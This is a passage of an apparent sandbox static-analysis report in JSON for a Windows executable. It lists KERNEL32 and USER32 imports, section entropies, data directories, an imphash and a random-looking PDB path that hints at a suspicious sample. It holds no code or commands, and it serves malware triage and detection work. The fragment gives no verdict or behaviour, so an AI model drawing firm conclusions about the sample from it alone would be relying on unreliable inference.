  2047. "name": "GetModuleFileNameW",
  2048. "address": "0x42b13c"
  2049. },
  2050. {
  2051. "name": "QueryPerformanceCounter",
  2052. "address": "0x42b140"
  2053. },
  2054. {
  2055. "name": "GetCurrentProcessId",
  2056. "address": "0x42b144"
  2057. },
  2058. {
  2059. "name": "GetSystemTimeAsFileTime",
  2060. "address": "0x42b148"
  2061. },
  2062. {
  2063. "name": "GetEnvironmentStringsW",
  2064. "address": "0x42b14c"
  2065. },
  2066. {
  2067. "name": "FreeEnvironmentStringsW",
  2068. "address": "0x42b150"
  2069. },
  2070. {
  2071. "name": "UnhandledExceptionFilter",
  2072. "address": "0x42b154"
  2073. },
  2074. {
  2075. "name": "SetUnhandledExceptionFilter",
  2076. "address": "0x42b158"
  2077. },
  2078. {
  2079. "name": "InitializeCriticalSectionAndSpinCount",
  2080. "address": "0x42b15c"
  2081. },
  2082. {
  2083. "name": "CreateEventW",
  2084. "address": "0x42b160"
  2085. },
  2086. {
  2087. "name": "Sleep",
  2088. "address": "0x42b164"
  2089. },
  2090. {
  2091. "name": "GetCurrentProcess",
  2092. "address": "0x42b168"
  2093. },
  2094. {
  2095. "name": "TerminateProcess",
  2096. "address": "0x42b16c"
  2097. },
  2098. {
  2099. "name": "TlsAlloc",
  2100. "address": "0x42b170"
  2101. },
  2102. {
  2103. "name": "TlsGetValue",
  2104. "address": "0x42b174"
  2105. },
  2106. {
  2107. "name": "TlsSetValue",
  2108. "address": "0x42b178"
  2109. },
  2110. {
  2111. "name": "TlsFree",
  2112. "address": "0x42b17c"
  2113. },
  2114. {
  2115. "name": "CreateSemaphoreW",
  2116. "address": "0x42b180"
  2117. },
  2118. {
  2119. "name": "EnterCriticalSection",
  2120. "address": "0x42b184"
  2121. },
  2122. {
  2123. "name": "LeaveCriticalSection",
  2124. "address": "0x42b188"
  2125. },
  2126. {
  2127. "name": "GetConsoleCP",
  2128. "address": "0x42b18c"
  2129. },
  2130. {
  2131. "name": "GetConsoleMode",
  2132. "address": "0x42b190"
  2133. },
  2134. {
  2135. "name": "SetFilePointerEx",
  2136. "address": "0x42b194"
  2137. },
  2138. {
  2139. "name": "IsValidCodePage",
  2140. "address": "0x42b198"
  2141. },
  2142. {
  2143. "name": "GetACP",
  2144. "address": "0x42b19c"
  2145. },
  2146. {
  2147. "name": "GetOEMCP",
  2148. "address": "0x42b1a0"
  2149. },
  2150. {
  2151. "name": "GetCPInfo",
  2152. "address": "0x42b1a4"
  2153. },
  2154. {
  2155. "name": "FatalAppExitA",
  2156. "address": "0x42b1a8"
  2157. },
  2158. {
  2159. "name": "SetConsoleCtrlHandler",
  2160. "address": "0x42b1ac"
  2161. },
  2162. {
  2163. "name": "FreeLibrary",
  2164. "address": "0x42b1b0"
  2165. },
  2166. {
  2167. "name": "LoadLibraryExW",
  2168. "address": "0x42b1b4"
  2169. },
  2170. {
  2171. "name": "GetDateFormatW",
  2172. "address": "0x42b1b8"
  2173. },
  2174. {
  2175. "name": "GetTimeFormatW",
  2176. "address": "0x42b1bc"
  2177. },
  2178. {
  2179. "name": "CompareStringW",
  2180. "address": "0x42b1c0"
  2181. },
  2182. {
  2183. "name": "LCMapStringW",
  2184. "address": "0x42b1c4"
  2185. },
  2186. {
  2187. "name": "GetLocaleInfoW",
  2188. "address": "0x42b1c8"
  2189. },
  2190. {
  2191. "name": "IsValidLocale",
  2192. "address": "0x42b1cc"
  2193. },
  2194. {
  2195. "name": "GetUserDefaultLCID",
  2196. "address": "0x42b1d0"
  2197. },
  2198. {
  2199. "name": "CloseHandle",
  2200. "address": "0x42b1d4"
  2201. }
  2202. ],
  2203. "dll": "KERNEL32.dll"
  2204. },
  2205. {
  2206. "imports": [
  2207. {
  2208. "name": "GetMenuBarInfo",
  2209. "address": "0x42b1dc"
  2210. },
  2211. {
  2212. "name": "DrawTextExA",
  2213. "address": "0x42b1e0"
  2214. },
  2215. {
  2216. "name": "SetWindowsHookA",
  2217. "address": "0x42b1e4"
  2218. },
  2219. {
  2220. "name": "DestroyIcon",
  2221. "address": "0x42b1e8"
  2222. },
  2223. {
  2224. "name": "GetOpenClipboardWindow",
  2225. "address": "0x42b1ec"
  2226. },
  2227. {
  2228. "name": "ClientToScreen",
  2229. "address": "0x42b1f0"
  2230. }
  2231. ],
  2232. "dll": "USER32.dll"
  2233. }
  2234. ],
  2235. "digital_signers": null,
  2236. "exported_dll_name": null,
  2237. "actual_checksum": "0x0005251b",
  2238. "overlay": null,
  2239. "imagebase": "0x00400000",
  2240. "reported_checksum": "0x0005251b",
  2241. "icon_hash": null,
  2242. "entrypoint": "0x00407b76",
  2243. "timestamp": "2018-07-23 08:18:02",
  2244. "osversion": "5.1",
  2245. "sections": [
  2246. {
  2247. "name": ".text",
  2248. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
  2249. "virtual_address": "0x00001000",
  2250. "size_of_data": "0x00029600",
  2251. "entropy": "6.72",
  2252. "raw_address": "0x00000400",
  2253. "virtual_size": "0x000294dd",
  2254. "characteristics_raw": "0x60000020"
  2255. },
  2256. {
  2257. "name": ".rdata",
  2258. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
  2259. "virtual_address": "0x0002b000",
  2260. "size_of_data": "0x00013200",
  2261. "entropy": "6.07",
  2262. "raw_address": "0x00029a00",
  2263. "virtual_size": "0x000130b2",
  2264. "characteristics_raw": "0x40000040"
  2265. },
  2266. {
  2267. "name": ".data",
  2268. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  2269. "virtual_address": "0x0003f000",
  2270. "size_of_data": "0x00002200",
  2271. "entropy": "2.74",
  2272. "raw_address": "0x0003cc00",
  2273. "virtual_size": "0x00014cc8",
  2274. "characteristics_raw": "0xc0000040"
  2275. },
  2276. {
  2277. "name": ".rsrc",
  2278. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
  2279. "virtual_address": "0x00054000",
  2280. "size_of_data": "0x00006400",
  2281. "entropy": "6.31",
  2282. "raw_address": "0x0003ee00",
  2283. "virtual_size": "0x000063b0",
  2284. "characteristics_raw": "0x40000040"
  2285. },
  2286. {
  2287. "name": ".reloc",
  2288. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
  2289. "virtual_address": "0x0005b000",
  2290. "size_of_data": "0x00002400",
  2291. "entropy": "6.55",
  2292. "raw_address": "0x00045200",
  2293. "virtual_size": "0x000022a0",
  2294. "characteristics_raw": "0x42000040"
  2295. }
  2296. ],
  2297. "resources": [],
  2298. "dirents": [
  2299. {
  2300. "virtual_address": "0x00000000",
  2301. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
  2302. "size": "0x00000000"
  2303. },
  2304. {
  2305. "virtual_address": "0x0003d4fc",
  2306. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
  2307. "size": "0x0000003c"
  2308. },
  2309. {
  2310. "virtual_address": "0x00054000",
  2311. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
  2312. "size": "0x000063b0"
  2313. },
  2314. {
  2315. "virtual_address": "0x00000000",
  2316. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
  2317. "size": "0x00000000"
  2318. },
  2319. {
  2320. "virtual_address": "0x00000000",
  2321. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
  2322. "size": "0x00000000"
  2323. },
  2324. {
  2325. "virtual_address": "0x0005b000",
  2326. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
  2327. "size": "0x000022a0"
  2328. },
  2329. {
  2330. "virtual_address": "0x0002b250",
  2331. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
  2332. "size": "0x00000038"
  2333. },
  2334. {
  2335. "virtual_address": "0x00000000",
  2336. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
  2337. "size": "0x00000000"
  2338. },
  2339. {
  2340. "virtual_address": "0x00000000",
  2341. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
  2342. "size": "0x00000000"
  2343. },
  2344. {
  2345. "virtual_address": "0x00000000",
  2346. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
  2347. "size": "0x00000000"
  2348. },
  2349. {
  2350. "virtual_address": "0x00000000",
  2351. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
  2352. "size": "0x00000000"
  2353. },
  2354. {
  2355. "virtual_address": "0x00000000",
  2356. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
  2357. "size": "0x00000000"
  2358. },
  2359. {
  2360. "virtual_address": "0x0002b000",
  2361. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
  2362. "size": "0x000001f8"
  2363. },
  2364. {
  2365. "virtual_address": "0x00000000",
  2366. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
  2367. "size": "0x00000000"
  2368. },
  2369. {
  2370. "virtual_address": "0x00000000",
  2371. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
  2372. "size": "0x00000000"
  2373. },
  2374. {
  2375. "virtual_address": "0x00000000",
  2376. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
  2377. "size": "0x00000000"
  2378. }
  2379. ],
  2380. "exports": [],
  2381. "guest_signers": {},
  2382. "imphash": "1f9917f590ed0711a560b3a3a279ed67",
  2383. "icon_fuzzy": null,
  2384. "icon": null,
  2385. "pdbpath": "C:\\madakonezanudano69\\widagemokiredugic-difulib-fu.pdb\\x00in\\kolanu.pdb\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa8\\x00\\x00\\x00\\xa7",
  2386. "imported_dll_count": 2,
  2387. "versioninfo": []
  2388. }
  2389. }